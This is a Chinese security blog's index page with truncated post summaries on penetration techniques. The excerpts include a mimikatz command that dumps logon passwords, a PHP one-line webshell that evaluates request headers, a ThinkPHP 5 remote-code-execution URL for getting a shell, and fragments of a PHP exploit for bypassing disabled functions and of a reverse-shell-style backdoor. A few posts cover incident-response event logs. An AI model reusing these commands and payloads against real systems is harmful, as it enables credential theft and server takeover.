摘要:sql注入lMySqlMySQL False注入及技巧总结MySQL 注入攻击与防御sql注入学习总结 SQL注入防御与绕过的几种姿势MySQL偏门技巧mysql注入可报错时爆表名、字段名、库名高级SQL注入:混淆和绕过MSSQLMSSQL DBA权限获取WEBSHELL的过程 MSSQL 注入攻击 阅读全文
posted @ 2017-09-19 21:59 Hookjoy 阅读 (1345) 评论 (0) 编辑
摘要:1.记录 Mimikatz输出: C:\>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir2.将输出导入到本地文件: C:\>mimikatz.exe ""privilege::de 阅读全文
posted @ 2015-09-20 00:06 Hookjoy 阅读 (1992) 评论 (0) 编辑
摘要:很多时候有些windows的服务器是支持wsh组建的,但是却执行不了命令,asp下执行被拒绝,php下执行报错,此时你可以借鉴以下的方法尝试。 php利用wsh突破函数禁用执行命令(安全模式同理)条件说明: 需要服务器是windows并支持wsh组建.且知道php安装目录php在IIS环境下利用ws 阅读全文
posted @ 2014-12-14 04:56 Hookjoy 阅读 (870) 评论 (0) 编辑
摘要:环境函数用法 nginx get_defined_vars() 返回由所有已定义变量所组成的数组 apache getallheaders() 获取全部 HTTP 请求头信息 apache环境 1 2 3 <?php eval(next(getallheaders())); ?> 1 2 3 <?p 阅读全文
posted @ 2019-12-30 02:03 Hookjoy 阅读 (25) 评论 (0) 编辑
摘要:= 0; $j--) { $address >= 8; } return $out; } function write(&$str, $p, $v, $n = 8) { $i = 0; for($i = 0; $i >= 8; } } function le... 阅读全文
posted @ 2019-12-16 10:29 Hookjoy 阅读 (27) 评论 (0) 编辑
只有注册用户登录后才能阅读该文。 阅读全文
posted @ 2019-11-29 22:11 Hookjoy 阅读 (3) 评论 (0) 编辑
摘要:#这个文章我之前在t00ls已经分享过了 #内容只是对tp5的实战环境下getshell做的记录,中间遇到的一些小问题的突破,没啥技术含量 -5.1.18 http://www.xxxxx.com/?s=admin/\think\app/invokefunction&function=call_us 阅读全文
posted @ 2019-11-03 11:47 Hookjoy 阅读 (212) 评论 (0) 编辑
摘要:原规则: <IfModule mod_rewrite.c> Options +FollowSymlinks -Multiviews RewriteEngine On RewriteCond %{REQUEST_FILENAME} !-d RewriteCond %{REQUEST_FILENAME} 阅读全文
posted @ 2019-10-17 11:39 Hookjoy 阅读 (46) 评论 (0) 编辑
摘要:子域名,旁站https://tools.ipip.net/ipdomain.php?ip=x.x.x.xhttps://cn.bing.com/search?q=ip:x.x.x.x Bing搜索https://api.hackertarget.com/reverseiplookup/?q=xxx. 阅读全文
posted @ 2019-09-05 22:39 Hookjoy 阅读 (465) 评论 (0) 编辑
摘要:Windows应急日志常用的几个事件ID点击站内没有搜索到,可能搜索姿势不对,发一下吧,应急时可能会用到,根据日志时间点判断入侵日志路径:C:\Windows\System32\winevt\Logs查看日志:Security.evtx、System.evtx、Application.evtx如何查 阅读全文
posted @ 2019-07-18 15:30 Hookjoy 阅读 (2004) 评论 (0) 编辑
摘要:array("pipe","r"),1 => array("pipe","w"),2 => array("pipe","w")); $cwd = getcwd(); $msg = php_uname()."\n------------Code by Spider-------------\n"; if($os == 'WIN') { $env = array('path' => 'c:... 阅读全文
posted @ 2019-07-16 12:02 Hookjoy 阅读 (83) 评论 (0) 编辑
只有注册用户登录后才能阅读该文。 阅读全文
posted @ 2019-07-09 13:08 Hookjoy 阅读 (4) 评论 (0) 编辑
摘要:windows操作系统事件日志 C:\Windows\System32\winevt\Logs\ *( XP C:\Windows\System32) 应用程序日志 App Event.Evtx(Application.evtx) 安全日志 SecEvent.Evtx 系统日志 SysEvent.E 阅读全文
posted @ 2019-07-01 22:32 Hookjoy 阅读 (322) 评论 (0) 编辑